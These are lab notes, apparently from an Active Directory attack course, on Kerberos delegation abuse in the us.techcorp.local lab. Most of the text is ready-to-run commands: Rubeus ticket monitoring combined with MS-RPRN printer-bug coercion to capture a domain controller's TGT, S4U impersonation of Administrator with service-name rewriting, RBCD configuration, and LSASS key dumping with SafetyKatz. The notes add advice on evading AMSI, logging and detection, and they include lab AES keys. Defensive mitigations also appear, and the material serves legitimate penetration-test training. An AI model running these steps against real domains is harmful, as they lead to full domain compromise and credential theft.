Kerberos delegation-based attacks (lab notes: us.techcorp.local)

Unconstrained delegation — a host with TrustedForDelegation set keeps the TGT of every principal that authenticates to it, so whoever controls that host can harvest those TGTs.

# Enumerate computer accounts flagged for unconstrained delegation (the TrustedForDelegation
# property of userAccountControl). Domain controllers carry this flag by design, so ignore
# them in the output; a non-DC host in this list is the target to land on.
# Get-ADComputer only returns computer objects — user accounts can carry the same flag, so
# repeat with Get-ADUser -Filter {TrustedForDelegation -eq $True} for completeness.
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
 
# Stage Rubeus on the unconstrained host (us-web) and watch for the DC's TGT.
# Writing to \\us-web\C$ needs local-admin rights on us-web; the leading "echo F" only answers
# xcopy's "file or directory?" prompt. C:\Users\Public is writable by everyone but is also an
# obvious place for AV/EDR to find a well-known tool such as Rubeus — a lab technique, not OPSEC-safe.
PS> echo F | xcopy C:\AD\Tools\Rubeus.exe \\us-web\C$\Users\Public\Rubeus.exe /Y
# Run this ON us-web (e.g. inside a remote session) and elevated: reading tickets out of other
# logon sessions requires admin/SYSTEM. It polls every 5 s for a TGT belonging to US-DC$ and prints
# it base64-encoded; /nowrap keeps it on one line so it can be passed straight to
# `Rubeus.exe ptt /ticket:<b64>`. Nothing is printed until something makes the DC authenticate
# to us-web — that is what the MS-RPRN coercion step is for.
PS> C:\Users\Public\Rubeus.exe monitor /targetuser:US-DC$ /interval:5 /nowrap
 
# Coerce the DC into authenticating to us-web via the MS-RPRN "printer bug"
# (RpcRemoteFindFirstPrinterChangeNotification): argument 1 is the host whose print spooler is
# asked to send a change notification, argument 2 is where it must send it — the unconstrained
# host running the Rubeus monitor. The spooler on us-dc authenticates with the US-DC$ machine
# account, so its TGT lands in us-web's ticket cache and the monitor picks it up.
# Caveats: the Print Spooler service must be running on the DC (Microsoft guidance is to disable
# it on DCs, in which case this silently produces nothing); any authenticated domain user can
# typically trigger it; and a DC machine-account TGT can be used for DCSync, i.e. full domain
# compromise. Defensively: disable Spooler on DCs, and put privileged accounts in Protected
# Users / mark them "sensitive and cannot be delegated" so their TGTs are never cached this way.
PS> C:\AD\Tools\MS-RPRN.exe \\us-dc.us.techcorp.local \\us-web.us.techcorp.local

Constrained delegation (classic KCD — msDS-AllowedToDelegateTo on the delegating account)

Find out which accounts (users or computers) are allowed to delegate, and to which services:

# List every object (users and computers alike — hence Get-ADObject rather than Get-ADComputer)
# whose msDS-AllowedToDelegateTo is populated, i.e. classic constrained delegation is configured.
# Pull TrustedToAuthForDelegation (protocol transition) as well: without it the S4U2Self ticket
# Rubeus obtains below is not forwardable and the S4U2Proxy request is rejected by the KDC —
#   Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo,TrustedToAuthForDelegation
PS> Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
 
# msDS-AllowedToDelegateTo: the SPN(s) this account may delegate to — this becomes Rubeus's /msdsspn value
# DistinguishedName: the account that holds the delegation right — you need its credential (password hash or AES key) to run S4U as it

Use S4U (S4U2Self + S4U2Proxy via Rubeus s4u) to obtain a service ticket as Administrator:

# S4U2Self + S4U2Proxy as appsvc: authenticate with appsvc's AES256 key, request a ticket to
# appsvc itself on behalf of Administrator (S4U2Self), then exchange it for a ticket to the
# service listed in msDS-AllowedToDelegateTo, CIFS/us-mssql (S4U2Proxy).
# /altservice:HTTP rewrites the service class in the resulting ticket: the sname is not covered
# by the ticket's encryption, so a ticket allowed for CIFS on us-mssql becomes one for HTTP
# (what WinRM uses) on the same host. /ptt injects it into the current logon session.
# Use the AES key rather than the RC4/NTLM hash — an RC4 ticket request for an account that
# normally uses AES stands out in 4768/4769 events. Impersonation fails for accounts in
# Protected Users or marked "sensitive and cannot be delegated"; recommend those as the fix.
# The key below is a lab value — never leave real key material in notes.
PS> C:\AD\Tools\Rubeus.exe s4u /user:appsvc /aes256:b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335 /impersonateuser:administrator /msdsspn:CIFS/us-mssql.us.techcorp.local /altservice:HTTP /domain:us.techcorp.local /ptt

Resource-based constrained delegation (RBCD — msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer)

This is possible with GenericWrite (or any other right that lets you write msDS-AllowedToActOnBehalfOfOtherIdentity) over the target computer object:

# PowerView: enumerate non-default ACEs in the domain and keep those granted to the principal we
# control (mgmtadmin). We are looking for GenericWrite (or GenericAll / WriteProperty on
# msDS-AllowedToActOnBehalfOfOtherIdentity) over a computer object — here it is us-helpdesk.
# PowerView must already be loaded in this session; the call walks every object's ACL over LDAP,
# so it is slow and noisy.
PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match 'mgmtadmin'}
 
# Configure RBCD on the computer we have GenericWrite over (us-helpdesk), allowing a principal
# we control (student21$) to delegate to it. Run the shell as the principal that holds that
# right (mgmtadmin). The InviShell launcher starts a PowerShell that, per its README, evades
# script-block/module logging and AMSI via a registry hook — a lab convenience, not something
# to rely on against a current EDR.
PS> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Load a standalone copy of the ActiveDirectory module (the DLL first, then the manifest) so
# Set-ADComputer is available without RSAT being installed on this box.
PS> Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS> Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
 
# The principal permitted to act on behalf of other identities must have an SPN, which is why a
# computer account we control (student21$ — presumably our own lab machine) is used rather than
# a plain user account.
PS> $comps = 'student21$'
# Writes msDS-AllowedToActOnBehalfOfOtherIdentity on us-helpdesk. The parameter sets the whole
# list rather than appending, so any legitimate existing entry is overwritten — record the current
# value first (Get-ADComputer us-helpdesk -Properties PrincipalsAllowedToDelegateToAccount) and
# restore it / clear it (-PrincipalsAllowedToDelegateToAccount $null) when done.
# Defensive note: a write to this attribute is a high-signal event to alert on (Event 5136 when
# directory-object auditing is enabled).
PS> Set-ADComputer -Identity us-helpdesk -PrincipalsAllowedToDelegateToAccount $comps -Verbose
 
# Dump Kerberos keys from LSASS on our own box (needs local admin / SYSTEM; SafetyKatz is a
# Mimikatz wrapper). Copy the aes256_hmac entry listed for the student21$ machine account —
# that is the credential used to authenticate as student21$ in the s4u step. Prefer the AES key
# over the NTLM/RC4 hash: an RC4 ticket request for an account that normally uses AES stands
# out in 4768/4769 events.
PS> C:\AD\Tools\SafetyKatz.exe -Command "sekurlsa::keys" "exit"
 
# S4U2Self + S4U2Proxy as the principal that RBCD now trusts: obtain tickets for Administrator
# to us-helpdesk — HTTP (what WinRM uses) and CIFS (file shares) — and inject them with /ptt.
# Do this from a fresh logon session so the injected tickets do not clobber ones you still need.
# NOTE(review): /user: must name the account whose key is supplied. The key was dumped for the
# computer account student21$ (the value put in $comps above), yet these lines use studentx21;
# as written the account name and key do not match and the TGT request should fail at
# pre-authentication — use the same account name, including the trailing $, in both places.
# The second request could also be folded into the first with /altservice:cifs, since the
# service name in the ticket is not protected; two separate requests work just as well.
PS> C:\AD\Tools\Rubeus.exe s4u /user:studentx21 /aes256:3845eac1016c33077d3619b3f931168db1343a223f3d7f9fc4424c77f8383578 /msdsspn:http/us-helpdesk /impersonateuser:administrator /ptt
PS> C:\AD\Tools\Rubeus.exe s4u /user:studentx21 /aes256:3845eac1016c33077d3619b3f931168db1343a223f3d7f9fc4424c77f8383578 /msdsspn:cifs/us-helpdesk /impersonateuser:administrator /ptt